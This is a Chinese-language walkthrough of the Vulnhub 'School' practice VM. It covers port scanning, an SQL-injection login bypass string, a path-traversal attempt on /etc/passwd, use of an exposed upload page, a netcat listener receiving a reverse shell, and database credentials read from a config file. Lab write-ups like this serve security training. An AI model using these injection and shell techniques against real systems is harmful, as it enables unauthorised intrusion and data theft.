Vulnhub之School靶机详细测试过程
School
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ sudo netdiscover -i eth1 Currently scanning: 172.16.70.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:36:fe:47 2 120 PCS Systemtechnik GmbH
192.168.56.122 08:00:27:ac:cb:15 1 60 PCS Systemtechnik GmbH
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.122 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 22:05 EST
Nmap scan report for localhost (192.168.56.122)
Host is up (0.00019s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
| 256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_ 256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
23/tcp open telnet?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, ms-sql-s, oracle-tns, tn3270:
|_ Verification Code:
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.92%I=7%D=11/28%Time=63857719%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(GenericLines
SF:,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(tn3270,1C,"Ve
SF:rification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(GetRequest,1C,"Verif
SF:ication\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(HTTPOptions,1C,"Verific
SF:ation\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(RTSPRequest,1C,"Verificat
SF:ion\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(RPCCheck,1C,"Verification\x
SF:20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(DNSVersionBindReqTCP,1C,"Verific
SF:ation\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(DNSStatusRequestTCP,1C,"V
SF:erification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(Help,1C,"Verificati
SF:on\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(SSLSessionReq,1C,"Verificati
SF:on\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(TerminalServerCookie,1C,"Ver
SF:ification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(TLSSessionReq,1C,"Ver
SF:ification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(Kerberos,1C,"Verifica
SF:tion\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(SMBProgNeg,1C,"Verificatio
SF:n\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(X11Probe,1C,"Verification\x20
SF:Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(FourOhFourRequest,1C,"Verification
SF:\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(LPDString,1C,"Verification\x20
SF:Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(LDAPSearchReq,1C,"Verification\x20
SF:Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(LDAPBindReq,1C,"Verification\x20Co
SF:de:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(SIPOptions,1C,"Verification\x20Code:
SF:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(LANDesk-RC,1C,"Verification\x20Code:\n\
SF:0\0\0\xee\x1e@\0\xe2\x1c")%r(TerminalServer,1C,"Verification\x20Code:\n
SF:\0\0\0\xee\x1e@\0\xe2\x1c")%r(NCP,1C,"Verification\x20Code:\n\0\0\0\xee
SF:\x1e@\0\xe2\x1c")%r(NotesRPC,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@
SF:\0\xe2\x1c")%r(JavaRMI,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2
SF:\x1c")%r(WMSRequest,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1
SF:c")%r(oracle-tns,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")
SF:%r(ms-sql-s,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c")%r(af
SF:p,1C,"Verification\x20Code:\n\0\0\0\xee\x1e@\0\xe2\x1c");
MAC Address: 08:00:27:AC:CB:15 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(SSH)、23(Telnet)、80(HTTP)
Get Access
访问23端口:
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ telnet 192.168.56.122
Trying 192.168.56.122...
Connected to 192.168.56.122.
Escape character is '^]'.
Verification Code:
�@�Connection closed by foreign host.
没有建立连接,需要验证码?
浏览器访问80端口,自动重定向到学生登录入口:
http://192.168.56.122/student_attendance/login.php
那会不会有管理员入口?
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ nikto -h http://192.168.56.122
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.122
+ Target Hostname: 192.168.56.122
+ Target Port: 80
+ Start Time: 2022-11-28 22:11:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /student_attendance
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2022-11-28 22:12:08 (GMT-5) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
Nikto工具没有给出更多有价值的信息。
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ gobuster dir -u http://192.168.56.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.122
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/28 22:13:28 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 220249 / 220561 (99.86%)===============================================================
2022/11/28 22:14:09 Finished
===============================================================
Gobuster工具没有扫描目录,继续扫描以下有无相关的文件?
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ gobuster dir -u http://192.168.56.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.122
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: txt,sh,html,php
[+] Timeout: 10s
===============================================================
2022/11/28 22:14:21 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 302) [Size: 0] [--> /student_attendance]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101274 / 1102805 (99.86%)===============================================================
2022/11/28 22:18:25 Finished
===============================================================
目录文件扫描没有得到任何有价值的结果,接下来只能是攻破用户登录了,在用暴力破解前,看能不能利用SQL注入方法绕过认证。
在username输入框中输入: admin' or '1'='1'--
即可成功登录,而且是administrator
看URL,似乎有本地文件包含漏洞,试一下:
http://192.168.56.122/student_attendance/index.php?page=home
试了以下:
http://192.168.56.122/student_attendance/index.php?page=../../../../../../etc/passwd
没有成功得到文件内容,那接下来看一下能不能上传shell.php。没有找到可以上传文件的位置,其实页面源代码有段注释:
<script>
$('#manage_my_account').click(function(){
uni_modal("Manage Account","manage_user.php?id=1&mtype=own")
})
</script>
<style>
.collapse a{
text-indent:10px;
}
nav#sidebar{
/*background: url(assets/uploads/1604743980_shell.php) !important*/
}
</style>
<nav id="sidebar" class='mx-lt-5 bg-dark' >
<div class="sidebar-list">
<a href="index.php?page=home" class="nav-item nav-home"><span class='icon-field'><i class="fa fa-tachometer-alt "></i></span> Dashboard</a>
<a href="index.php?page=courses" class="nav-item nav-courses"><span class='icon-field'><i class="fa fa-th-list "></i></span> Course</a>
<a href="index.php?page=subjects" class="nav-item nav-subjects"><span class='icon-field'><i class="fa fa-book "></i></span> Subject</a>
<a href="index.php?page=class" class="nav-item nav-class"><span class='icon-field'><i class="fa fa-list-alt "></i></span> Class</a>
<a href="index.php?page=faculty" class="nav-item nav-faculty"><span class='icon-field'><i class="fa fa-user-tie "></i></span> Faculty</a>
<a href="index.php?page=students" class="nav-item nav-students"><span class='icon-field'><i class="fa fa-user-friends "></i></span> Student</a>
<a href="index.php?page=class_subject" class="nav-item nav-class_subject"><span class='icon-field'><i class="fa fa-user-friends "></i></span> Class per Subject</a>
<a href="index.php?page=check_attendance" class="nav-item nav-check_attendance"><span class='icon-field'><i class="fa fa-tasks "></i></span> Check Attendance</a>
<a href="index.php?page=attendance_record" class="nav-item nav-attendance_record"><span class='icon-field'><i class="fa fa-tasks "></i></span> Attendance Record</a>
<a href="index.php?page=attendance_report" class="nav-item nav-attendance_report"><span class='icon-field'><i class="fa fa-tasks "></i></span> Attendance Report</a>
<a href="index.php?page=users" class="nav-item nav-users"><span class='icon-field'><i class="fa fa-users "></i></span> Users</a>
<!-- <a href="index.php?page=site_settings" class="nav-item nav-site_settings"><span class='icon-field'><i class="fa fa-cogs text-danger"></i></span> System Settings</a> -->
</div>
assets/uploads/1604743980_shell.php,不过无法访问,
另外一处注释:index.php?page=site_settings
http://192.168.56.122/student_attendance/index.php?page=site_settings
发现可以上传文件
在目录/uploads发现有个shell.php文件
http://192.168.56.122/student_attendance/assets/uploads/
┌──(kali㉿kali)-[~/Vulnhub/School]
┌──(kali㉿kali)-[~/Vulnhub/School]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.122] 58406
Linux school 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux
04:04:16 up 1:21, 0 users, load average: 0.00, 0.03, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@school:/$ ls
ls
bin home lib32 media root sys vmlinuz
boot initrd.img lib64 mnt run tmp vmlinuz.old
dev initrd.img.old libx32 opt sbin usr
etc lib lost+found proc srv var
www-data@school:/$ cd /home
cd /home
www-data@school:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Nov 7 2020 .
drwxr-xr-x 18 root root 4.0K Nov 3 2020 ..
drwxr-xr-x 2 fox fox 4.0K Nov 7 2020 fox
drwxr-xr-x 2 ppp ppp 4.0K Oct 10 2020 ppp
www-data@school:/home$ cd fox
cd fox
www-data@school:/home/fox$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 fox fox 4.0K Nov 7 2020 .
drwxr-xr-x 4 root root 4.0K Nov 7 2020 ..
lrwxrwxrwx 1 fox fox 9 Nov 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 fox fox 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 fox fox 3.5K Apr 18 2019 .bashrc
-rw-r--r-- 1 fox fox 807 Apr 18 2019 .profile
-rw-r--r-- 1 fox fox 33 Nov 7 2020 local.txt
www-data@school:/home/fox$ cat local.txt
cat local.txt
e4ed03b4852906b6cb716fc6ce0f9fd5
www-data@school:/home/fox$
www-data@school:/var/www/html/student_attendance$ cat db_connect.php
cat db_connect.php
<?php
$conn= new mysqli('localhost','fox','trallalleropititumpa','student_attendance_db')or die("Could not connect to mysql".mysqli_error($con));
www-data@school:/var/www/html/student_attendance$
这个文件中有数据库连接用户名和密码,会不会也是系统的用户名和密码?发现不是。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
